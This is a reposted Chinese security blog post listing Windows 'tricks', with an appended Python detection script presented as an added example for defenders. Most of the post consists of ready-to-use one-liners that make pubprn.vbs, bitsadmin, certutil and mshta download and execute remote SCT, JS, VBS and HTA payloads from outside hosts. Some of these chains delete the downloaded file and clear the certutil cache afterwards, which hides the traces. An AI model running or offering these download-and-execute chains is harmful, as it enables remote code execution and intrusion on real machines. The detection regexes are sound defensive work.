Some Tricks

Another way to execute a remote SCT scriptlet

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

Details: https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd


Command-line download, method 1


bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /rawreturn /transfer getpayload http://download.sysinternals.com/files/PSTools.zip c:\p.zip
bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"


Command-line download, method 2

certutil -urlcache -split -f http://192.168.254.102:80/a.txt b.txt

Clear the cache: certutil -urlcache -split -f http://192.168.254.102:80/a.txt delete


Executing remote JS from the command line


certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete

Executing remote VBS from the command line


certutil -urlcache -split -f http://192.168.254.102:80/abc a.vbs && cscript a.vbs && del a.vbs && certutil -urlcache -split -f http://192.168.254.102:80/abc delete

Executing a remote HTA from the command line


mshta http://192.168.254.102/1.hta
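
For defenders, the command forms listed on this page can be matched in process command-line telemetry. The following is an added example, not code from the original post: the rule labels, function names and sample lines are constructed for illustration. It labels each chained command and correlates a certutil download with a later cscript/wscript run of the same file.

```python
import re

URL = r"(?:https?|ftp)://[^\s\"]+"
CERTUTIL = r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*?"
# Download form: the token after the URL is the output file (or "delete" for cleanup).
CERTUTIL_DL = re.compile(CERTUTIL + r"(?P<url>" + URL + r")(?:\s+(?P<out>\S+))?", re.I)
RULES = [  # first match wins, so the cache-cleanup form precedes the download form
    ("pubprn_remote_sct", re.compile(r"\bpubprn\.vbs\b.*\bscript:" + URL, re.I)),
    ("bitsadmin_download", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b.*" + URL, re.I)),
    ("certutil_cache_delete", re.compile(CERTUTIL + URL + r"\s+delete\s*$", re.I)),
    ("certutil_download", CERTUTIL_DL),
    ("mshta_remote_hta", re.compile(r"\bmshta(?:\.exe)?\s+\"?" + URL, re.I)),
]
SCRIPT_HOST = re.compile(r"\b[cw]script(?:\.exe)?(?:\s+/\S+)*\s+\"?(?P<file>[^\s\"]+)", re.I)

# Constructed sample command lines, modelled on the forms shown on this page.
SAMPLES = [
    r"certutil -urlcache -split -f http://192.168.254.102:80/a a.js && cscript a.js &&  del a.js && certutil -urlcache -split -f http://192.168.254.102:80/a delete",
    r'bitsadmin /transfer myDownLoadJob /download /priority normal "http://download.sysinternals.com/files/PSTools.zip" "c:\p.zip"',
    r"certutil -hashfile b.txt SHA256",  # benign certutil use, must not match
]

def segments(cmdline):
    """Split a cmd.exe line on '&&' and on '&' surrounded by whitespace."""
    return [s.strip() for s in re.split(r"\s*&&\s*|\s+&\s+", cmdline) if s.strip()]

def classify(cmdline):
    """Return one rule label per chained command that matches."""
    hits = []
    for seg in segments(cmdline):
        for label, rx in RULES:
            if rx.search(seg):
                hits.append(label)
                break
    return hits

def fetch_then_run(cmdline):
    """Return (url, file) pairs where certutil wrote a file a later script host ran."""
    written, pairs = {}, []
    for seg in segments(cmdline):
        m = CERTUTIL_DL.search(seg)
        if m and m.group("out") and m.group("out").lower() != "delete":
            written[m.group("out").lower()] = m.group("url")
            continue
        h = SCRIPT_HOST.search(seg)
        if h and h.group("file").lower() in written:
            pairs.append((written[h.group("file").lower()], h.group("file")))
    return pairs
```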


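Source: Evi1cg's blog

Original link: https://evi1cg.me/archives/Tricks.html

This article was published on 华盟网 by congtou. Copyright belongs to 华盟网. The content reflects the author's personal views and does not mean that 华盟网 agrees with or supports them. Please credit the source when reposting.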
